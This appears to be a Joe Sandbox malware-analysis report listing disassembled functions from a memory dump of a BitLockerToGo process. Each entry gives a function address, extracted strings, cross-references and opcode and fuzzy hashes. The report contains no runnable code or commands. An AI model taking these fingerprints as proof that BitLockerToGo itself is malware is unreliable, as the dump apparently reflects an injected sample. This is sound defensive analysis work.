Opcode ID: d0dbd7a69fadeca85af69e65969bbf39726cf1834c9351aeb789baca1ec36ce9
Instruction ID: b79382568fe6dc38f5371aed8ce3e114e53c3f7f917697914ca12be5e1f6d821
Opcode Fuzzy Hash: d0dbd7a69fadeca85af69e65969bbf39726cf1834c9351aeb789baca1ec36ce9
Instruction Fuzzy Hash: 90617AB45083509BC7009F15E891A2BBBF0EFA2755F44896EF8C59B361E339D900CB5B

Function 0042810E Relevance: 2.7, Strings: 2, Instructions: 219COMMON

Download Yara Rule

Strings

63=!, xrefs: 0042822F
=:;8, xrefs: 00428163, 0042816B

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 63=!$=:;8
API String ID: 0-3194516785
Opcode ID: 1b38e8a4762db62b870f21df733644aed28ee28fed4ac6565bc49b277a814fb2
Instruction ID: 207cda57c48a5be69b8e58de3d70471b4b6fec487799f6f1de9bc0d6ed0245df
Opcode Fuzzy Hash: 1b38e8a4762db62b870f21df733644aed28ee28fed4ac6565bc49b277a814fb2
Instruction Fuzzy Hash: A971ACB460D3908BD311DF14E850A2FBBE1FB9A745F64092DE2C19B291DB3AD850CB1A

Function 00449790 Relevance: 2.7, Strings: 2, Instructions: 174COMMON

Download Yara Rule

Strings

4`[b, xrefs: 00449930
%&' , xrefs: 00449823, 0044982B

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: %&' $4`[b
API String ID: 0-3857453902
Opcode ID: 27bc790551a9fd1dd02346b61fa2f21db170f7e001eeffd318f0017c6ddd435f
Instruction ID: 0f03d50ee7e58a51ffa102ed8df14a125d3a912e3b5faa4dd9958aacb2bfff8e
Opcode Fuzzy Hash: 27bc790551a9fd1dd02346b61fa2f21db170f7e001eeffd318f0017c6ddd435f
Instruction Fuzzy Hash: E25138316082005BE724AE19DC81B2FB7E6EFCA715F28462DE8D967391C735EC10DB5A

Function 00429490 Relevance: 2.6, Strings: 2, Instructions: 147COMMON

Download Yara Rule

Strings

tv, xrefs: 004294A5
(+, xrefs: 00429605

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: (+$tv
API String ID: 0-3676751356
Opcode ID: a9354aa1648ea22c4e0235471858b5f57c56dda2ceafc28a1de9402c2dd536be
Instruction ID: dc3942a8275999504580fe626126e40f7ec94d3b1c291a20b5dddda645e648df
Opcode Fuzzy Hash: a9354aa1648ea22c4e0235471858b5f57c56dda2ceafc28a1de9402c2dd536be
Instruction Fuzzy Hash: D2510FB050C381ABD300EF15E980A0EBBF4EB96784F94491DF0D85B251D379D9058FAB

Function 00415EA6 Relevance: 2.6, Strings: 2, Instructions: 112COMMON

Download Yara Rule

Strings

OdA, xrefs: 00415FA9
vXA, xrefs: 00415F7B

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: OdA$vXA
API String ID: 0-3578555530
Opcode ID: 7031f37596c8571c3cc4db677c45b1c1f80b841c9a3d502cbc154cfe689bef19
Instruction ID: bc89c5dda5b93838f5d357cd3af5a40e2fe3aaf4cafc4d3668b845d686a292cc
Opcode Fuzzy Hash: 7031f37596c8571c3cc4db677c45b1c1f80b841c9a3d502cbc154cfe689bef19
Instruction Fuzzy Hash: 9041CEB1A00B01CFD7209F29EE81916B7F5BF4A305B04463EE84A93B52EB34F911CB58

Function 00444EA0 Relevance: 2.6, Strings: 2, Instructions: 101COMMON

Download Yara Rule

Strings

=:;8, xrefs: 00444F23, 00444F2B
ga, xrefs: 00444EA0

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: =:;8$ga
API String ID: 0-872809095
Opcode ID: bbceca7d1cd3a9552e12138e7dfdaa104044db1751ca1a6410897ec1b8ce099d
Instruction ID: 9ea1b24237d494468514723161a7ae929c80eef1ddad3c35492a8935926dad10
Opcode Fuzzy Hash: bbceca7d1cd3a9552e12138e7dfdaa104044db1751ca1a6410897ec1b8ce099d
Instruction Fuzzy Hash: BB31F774508340AFE300DF15D984B1BFBE5EBD6318F24C92EE48897251D779D9098BAA

Function 00425120 Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

TW, xrefs: 00425175
0RB, xrefs: 0042522A

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 0RB$TW
API String ID: 0-3538556968
Opcode ID: 2b3704bd25301d3b0d819be2a58c15a7f0f4bffc9d38fda6e95e8afae50d3cc0
Instruction ID: d0c8503c4b3450a93615e2b7cf37284fce28dcae500f43890c9cb27359c3ef5d
Opcode Fuzzy Hash: 2b3704bd25301d3b0d819be2a58c15a7f0f4bffc9d38fda6e95e8afae50d3cc0
Instruction Fuzzy Hash: 11219FB5909620DBC710AF18D851A3BB7F4EF92765F84890DE4D48B391E338C914CBAA

Function 0041F617 Relevance: 1.8, Strings: 1, Instructions: 532COMMON

Download Yara Rule

Strings

_jgr, xrefs: 0041F9DD

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: _jgr
API String ID: 0-1675453294
Opcode ID: 729e7a5ef27cac6fa47f478896f536e64de0f9afaf2317cefdb91c96259033e5
Instruction ID: 30ab3aa63ff255e3482f40709e3c8fadc0923c46c603b1201d6ae7659a41d45b
Opcode Fuzzy Hash: 729e7a5ef27cac6fa47f478896f536e64de0f9afaf2317cefdb91c96259033e5
Instruction Fuzzy Hash: 802289B05083809FD730CF24D881BDBBBE1AF95305F14892DE4C98B252DB7A9995CF96

Function 004272F0 Relevance: 1.7, APIs: 1, Instructions: 242comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0044FB80,00000000,00000001,0044FB70), ref: 00427319

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: a73e39f304e6d4d803bbb67e5146a615bb8d6b315d64ac383ec69deacac99ef1
Instruction ID: becdf4dddac3ce1a8039fbfa9c09773f5c5e3ebb2addd79e6cc58b85ad0e98e9
Opcode Fuzzy Hash: a73e39f304e6d4d803bbb67e5146a615bb8d6b315d64ac383ec69deacac99ef1
Instruction Fuzzy Hash: 1651E1B1704320ABDB20EB24DC86B7777A4EF86358F444559F985CB391E379E801C76A

Function 004283E6 Relevance: 1.7, Strings: 1, Instructions: 405COMMON

Download Yara Rule

Strings

=:;8, xrefs: 00428463, 0042846B

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: =:;8
API String ID: 2994545307-508151936
Opcode ID: 622b308d800549bf86526f981d546c536f3cf98df363f57bfe572fc67993b986
Instruction ID: 387dd3d7f08ae79748510aab5917b9b70d1bd402916f6768b5f2646c1dd8d2e5
Opcode Fuzzy Hash: 622b308d800549bf86526f981d546c536f3cf98df363f57bfe572fc67993b986
Instruction Fuzzy Hash: 9FE1EF71609312CFD714CF28D89062AB7E2FF89346F49897CE995873A2EB34D950CB85

Function 00431460 Relevance: 1.6, Strings: 1, Instructions: 396COMMON

Download Yara Rule

Strings

", xrefs: 00431748

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 15fbd228172a941f40f8c5a663cfac51158b3cb21fa6c1d5a89d5fac3fcb5393
Instruction ID: 11afba32fa5069133faae4e00bc3492b5287a094a5eac0ead96f94a88b40d35e
Opcode Fuzzy Hash: 15fbd228172a941f40f8c5a663cfac51158b3cb21fa6c1d5a89d5fac3fcb5393
Instruction Fuzzy Hash: 64C149B2A043005BD7149F64C49176BB7E9AF88354F1C962FE895873A2E73CDC05C79A

Function 0044A200 Relevance: 1.6, Strings: 1, Instructions: 392COMMON

Download Yara Rule

Strings

P, xrefs: 0044A3A7

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: P
API String ID: 0-3110715001
Opcode ID: 6c3bfba0715aee9242b7465bd0729a97e607f30ecdcd4a7bde995b1083fd9f6d
Instruction ID: 9fe2c7c15e4b1631bdcfaf7dbd721357a72db19052ddf2a400d6ded9ec6bc362
Opcode Fuzzy Hash: 6c3bfba0715aee9242b7465bd0729a97e607f30ecdcd4a7bde995b1083fd9f6d
Instruction Fuzzy Hash: B1D114329483254FE725CE18988071FB6E1EB84754F1A863DECA5AB391DB74DC058BC6

Function 0042C670 Relevance: 1.6, Strings: 1, Instructions: 368COMMON

Download Yara Rule

Strings

=:;8, xrefs: 0042C6B3, 0042C6BB

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: =:;8
API String ID: 2994545307-508151936
Opcode ID: faa5e0bf4aabddad7e31678595dd7ca85faaee0d356475892e5aa9c90fa40f88
Instruction ID: 40b02eb1f6e22be62857c93ef42b0758dbcaeb85ce301733e76f489525357f27
Opcode Fuzzy Hash: faa5e0bf4aabddad7e31678595dd7ca85faaee0d356475892e5aa9c90fa40f88
Instruction Fuzzy Hash: 4DB1FEB16083118BD714EF18E880B2FB7E2EF95305F58492EE58597391E739E904CB9A

Function 00448DCF Relevance: 1.6, Strings: 1, Instructions: 366COMMON

Download Yara Rule

Strings

dfb, xrefs: 00448FF3, 00448FFB

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: dfb
API String ID: 0-2206809919
Opcode ID: 45e393d4fcbba1c1d3d9fed35e41152e1ac0b827800af438496c2cd636a05e75
Instruction ID: c1e5aa0a579105c3bc510786dd6d67c9c517df08a0a61968fbc9a77e841bd144
Opcode Fuzzy Hash: 45e393d4fcbba1c1d3d9fed35e41152e1ac0b827800af438496c2cd636a05e75
Instruction Fuzzy Hash: 27C12236618341CFC714CF28E89162AB7F2FB89312F5A8A7DD491973A2DB35D944CB84

Function 0042EE5A Relevance: 1.5, Strings: 1, Instructions: 277COMMON

Download Yara Rule

Strings

P7c5, xrefs: 0042EEDD

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: P7c5
API String ID: 0-3540967404
Opcode ID: 03ced1c7a96f9e0d9f7756f3098496ba2362da0b1dfffc4369a79d9bf5656189
Instruction ID: 21ffa89e22a580854a588d46777559ce9c1d76e09d6bfea33da365ed72ee0cf9
Opcode Fuzzy Hash: 03ced1c7a96f9e0d9f7756f3098496ba2362da0b1dfffc4369a79d9bf5656189
Instruction Fuzzy Hash: B8819EB4900215CBDF10CF55D991BAEB7B1FF4A319F640099E844AF392D3399D42CB6A

Function 0040A680 Relevance: 1.5, Strings: 1, Instructions: 265COMMON

Download Yara Rule

Strings

,, xrefs: 0040A7B6

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: bb47ef47d35e896b2853d97d7f9f6bb0c9e14eb7f2450e4bfbd64f323846cefb
Instruction ID: a1960ff7e22860078590a466985bdc735092ad62ad5ac98caf8b5d2c7d57e1ab
Opcode Fuzzy Hash: bb47ef47d35e896b2853d97d7f9f6bb0c9e14eb7f2450e4bfbd64f323846cefb
Instruction Fuzzy Hash: 5AB13B712083819FC325CF28C88461BFBE0AFA9704F448E2EE5D597782D635E918CB67

Function 00416497 Relevance: 1.5, Strings: 1, Instructions: 232COMMON

Download Yara Rule

Strings

vXA, xrefs: 00415F7B

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: vXA
API String ID: 0-3699665834
Opcode ID: 56b129312420eac9f57433d1890b44edcba8c01d2b434c9141f5723bc8786fc7
Instruction ID: 09171afab7f7b5ea8e8a2020d4831ef266f24f210457f6db82dcc6acaac8e5e6
Opcode Fuzzy Hash: 56b129312420eac9f57433d1890b44edcba8c01d2b434c9141f5723bc8786fc7
Instruction Fuzzy Hash: 05819C75900B00CFD7209F28DA81A27B7F2BF4A705F04896ED49A97B52E739F815CB58

Function 00438DF0 Relevance: 1.5, Strings: 1, Instructions: 208COMMON

Download Yara Rule

Strings

0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 00438EC3, 00438FB5

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
API String ID: 0-442858466
Opcode ID: 0be2ca4d21d21b4c4c6c21e15692f01bf0890a000a7094a18729e1d020d80077
Instruction ID: ab25fb2e65b67b04a702ba2284077ab6577f2293ff585d7396bbabc5bf43c754
Opcode Fuzzy Hash: 0be2ca4d21d21b4c4c6c21e15692f01bf0890a000a7094a18729e1d020d80077
Instruction Fuzzy Hash: F2616E3660969047D7189A3C5C912B9AB534B9B330F3D93BFF8718B3D5C52D48075369

Function 00446430 Relevance: 1.5, Strings: 1, Instructions: 205COMMON

Download Yara Rule

Strings

=:;8, xrefs: 00446473, 0044647B

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: =:;8
API String ID: 0-508151936
Opcode ID: af1f78e5c3acb81c7f4b857d09ab760b38a36ee7671b155c5da769c21dd72643
Instruction ID: 110a075e8147e8ca7d293d5e3c478eecd75ab491ffc930f9143d856e3b8c1778
Opcode Fuzzy Hash: af1f78e5c3acb81c7f4b857d09ab760b38a36ee7671b155c5da769c21dd72643
Instruction Fuzzy Hash: E161D370608301ABE711DF15D880B2BB7E2EFC6314F26891EE59487351D779E811CB4B

Function 004452E0 Relevance: 1.4, Strings: 1, Instructions: 167COMMON

Download Yara Rule

Strings

=:;8, xrefs: 004453A3, 004453AB

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: =:;8
API String ID: 0-508151936
Opcode ID: 864f3d3acccb658d248d8e5fd473dc0318756bc07619f7b72a674ec0e6b880b0
Instruction ID: 79141c29b0323175f8ae8c8937a0c70e6635369a4b068b7f93e986bd55068593
Opcode Fuzzy Hash: 864f3d3acccb658d248d8e5fd473dc0318756bc07619f7b72a674ec0e6b880b0
Instruction Fuzzy Hash: 9051A3745087009BEB249F14D840A2FB7E5EF89749F18881EE9C59B313D739DC50CB5A

Function 00428768 Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

=:;8, xrefs: 004287F3, 004287FB

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: =:;8
API String ID: 0-508151936
Opcode ID: a72bc68e2aede223980f93fd5fb422d081606558f8053b665ef58137ca68c525
Instruction ID: 57ab7ab586d7403b0fd1aa3b92d55d11571fd79fcea12bb135b8fa036e76dddf
Opcode Fuzzy Hash: a72bc68e2aede223980f93fd5fb422d081606558f8053b665ef58137ca68c525
Instruction Fuzzy Hash: 2651C171609342CBE708CF28E89162EB7E2FF88342F48857DE58687692DB35DD60CB45

Function 0044BF40 Relevance: 1.4, Strings: 1, Instructions: 119COMMON

Download Yara Rule

Strings

@, xrefs: 0044BFC0

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 9c1c0cd41ae36ff554169399b535e6465f289ca177026fd1adb0e0560b7311c2
Instruction ID: a3aa015b9e8469f7ace60a02901b74ad380a113e4e76cb296ad42d9706a22fb9
Opcode Fuzzy Hash: 9c1c0cd41ae36ff554169399b535e6465f289ca177026fd1adb0e0560b7311c2
Instruction Fuzzy Hash: 0E31A3719093049BE324DF58D88462FBBE5FFC9308F18892DE9C457251D779D904CB9A

Function 00423662 Relevance: 1.3, Strings: 1, Instructions: 57COMMON

Download Yara Rule

Strings

6B, xrefs: 0042369E

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 6B
API String ID: 0-4127139157
Opcode ID: 29118634d2acf47c73217c08e5961c63c93616de1f6113f9800df86cc160fc49
Instruction ID: 350f5e069e545c5959035cc970b88314bb98fd8c880948600cee55ec4eaf9fcf
Opcode Fuzzy Hash: 29118634d2acf47c73217c08e5961c63c93616de1f6113f9800df86cc160fc49
Instruction Fuzzy Hash: C001D2B1E00214BBE7209F589C47BAA767CAB09366F550218F915E73C0E774E9018BB9

Function 0042D262 Relevance: 1.3, Strings: 1, Instructions: 50COMMON

Download Yara Rule

Strings

LM, xrefs: 0042D2F6

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: LM
API String ID: 0-360198107
Opcode ID: 45914b8ddd165326254cdcc3b4b6dd99c3519c33a7173016c8048f4b3de2f8d4
Instruction ID: 94ceeaba12fbb02820a5699435ba4751bbb274bfc58af20b179bb7793f0f3488
Opcode Fuzzy Hash: 45914b8ddd165326254cdcc3b4b6dd99c3519c33a7173016c8048f4b3de2f8d4
Instruction Fuzzy Hash: 2721F3B0D002699BDB20DFE5DA41BAEFB31FB01344F600859D5587B246D7349986DF19

Function 0040BCE0 Relevance: .8, Instructions: 815COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efb7ff3fd4ebb2f3b7164328df8d0b14eb7ad6a7fcb8728f5775bbb9fd49e4c9
Instruction ID: 7b0cb13b48ad00b77850f8b1647eadeb89d38fa2ea50f461afb5b8f6c301bb5a
Opcode Fuzzy Hash: efb7ff3fd4ebb2f3b7164328df8d0b14eb7ad6a7fcb8728f5775bbb9fd49e4c9
Instruction Fuzzy Hash: 5B52A131508315CBC725DF18E9802ABB3E1FFC4314F258A3ED996A7385D739A951CB8A

Function 0040B1D0 Relevance: .7, Instructions: 670COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd4f423bca254d8c79983314e55918cbc1d3bb99baac6ae9f1fa30a6484525a6
Instruction ID: b275d5d498ef01dfe3ac2cfd1c4f641c74b90b479ccc2474c68c698ebcb56700
Opcode Fuzzy Hash: fd4f423bca254d8c79983314e55918cbc1d3bb99baac6ae9f1fa30a6484525a6
Instruction Fuzzy Hash: EB52B3709087849FE7358B24C4847A7BBE1EB91314F14887EC5E656BC2D3BDA885CB8D

Function 00406ED0 Relevance: .7, Instructions: 657COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f375f3bc644a1d239b7a243414e5b2de4bec954894fee46f96e4e04ab28fc56
Instruction ID: 2b60630eceae2b6484588bae8449e901fb94bb3b65f3c8cfaef93aff5c84d132
Opcode Fuzzy Hash: 6f375f3bc644a1d239b7a243414e5b2de4bec954894fee46f96e4e04ab28fc56
Instruction Fuzzy Hash: 4E52D43190C3458FCB15CF14C0906AABBE1BF89314F198A7EF89967391D778E849CB86

Function 004078D0 Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8427a5e1996fa57af05af806e65bcf1a59fbe5cabcfb9b4778e5585426d7df3d
Instruction ID: 0fcfb9ddeca6defa6341d47d33e92dacc8c2ce1ab058de74c3df7aa1c8dfcb5e
Opcode Fuzzy Hash: 8427a5e1996fa57af05af806e65bcf1a59fbe5cabcfb9b4778e5585426d7df3d
Instruction Fuzzy Hash: C8323370A19B118FC368CF29C68052ABBF1BF45310B604A2ED69797F90D73AF845CB59

Function 004145B2 Relevance: .5, Instructions: 500COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3a3e9049a7cc9c68be53a30ccb5c42a27b974ce428d7db7273043c34fa5fa7d
Instruction ID: fd34e41be580de07b0d719e0e9c13311da1f304f29a18e05e1bd2797d4908b90
Opcode Fuzzy Hash: e3a3e9049a7cc9c68be53a30ccb5c42a27b974ce428d7db7273043c34fa5fa7d
Instruction Fuzzy Hash: 38F1ADB5500B008FD724CF25D980A67B7F2BF86305F148A2ED49A87B92E778F845CB59

Function 0040A1C0 Relevance: .4, Instructions: 399COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c4bfba50e780612c4a0d5579eac39ae2e1e72eaabeb832671a05257be6c7dd8
Instruction ID: b8f035646f9018faff6b7e7fd49908c4aa520ac74c04bb359018ad74e6156ce5
Opcode Fuzzy Hash: 4c4bfba50e780612c4a0d5579eac39ae2e1e72eaabeb832671a05257be6c7dd8
Instruction Fuzzy Hash: 01E17A712083418FC720DF29C880A6BBBE1EF99304F448D2EE4D597791E779E958CB96

Function 00421430 Relevance: .4, Instructions: 384COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e3dfd60f32dd3d876edb7ef485708126c96d4bfeb0cb0b15ed1d59a542e0bfd
Instruction ID: fcdc5748a787169fae961dceaa695ea6c95a35734d136c9ad5161aedc601d0c9
Opcode Fuzzy Hash: 7e3dfd60f32dd3d876edb7ef485708126c96d4bfeb0cb0b15ed1d59a542e0bfd
Instruction Fuzzy Hash: E6A18F745083508BC710EF14D891A2BB7F4FFA6354F948A4DE8D58B3A1E339D944CB9A

Function 004140EB Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb7fdbd8e2ff752da8fc3606a2a434b091aefcce3f76075a8a564e61d94a2bc6
Instruction ID: 17df4237032f7348c945789235b0f3985fe37455271cee6f48cfa2ddae2356c8
Opcode Fuzzy Hash: bb7fdbd8e2ff752da8fc3606a2a434b091aefcce3f76075a8a564e61d94a2bc6
Instruction Fuzzy Hash: 53B18CB4500B419FD731CF24C980BA3B7E6AF86714F14891ED4AA87B81D778F884CB99

Function 0041526A Relevance: .3, Instructions: 321COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 957410e3c1d49787c0ac81bad001eb0a1857fa7590026ef9c757b03f8081d37a
Instruction ID: 63ef2d1161d00596ad47cc755f7b235dbf43bed024da93e692a5e49fbd2ce187
Opcode Fuzzy Hash: 957410e3c1d49787c0ac81bad001eb0a1857fa7590026ef9c757b03f8081d37a
Instruction Fuzzy Hash: 26B15A70500B40DBD3218F25C980B97BBF6EF86B05F44891EE4AA97B52E339F854CB58

Function 0040AD40 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dec829686ff7288e1bf90ecdc4b0d292f33f8680c45cb1c2da7473ab2f4bedf1
Instruction ID: d1cd5ec7bb34ba835ca0561b58640843899da24c3083794bb888cb3cc114dd4a
Opcode Fuzzy Hash: dec829686ff7288e1bf90ecdc4b0d292f33f8680c45cb1c2da7473ab2f4bedf1
Instruction Fuzzy Hash: 7DC15CB29587418FC360CF28CC96BABB7E1FF85318F08492DD1D9D6242E778A155CB4A

Function 0044C650 Relevance: .3, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Yara matches

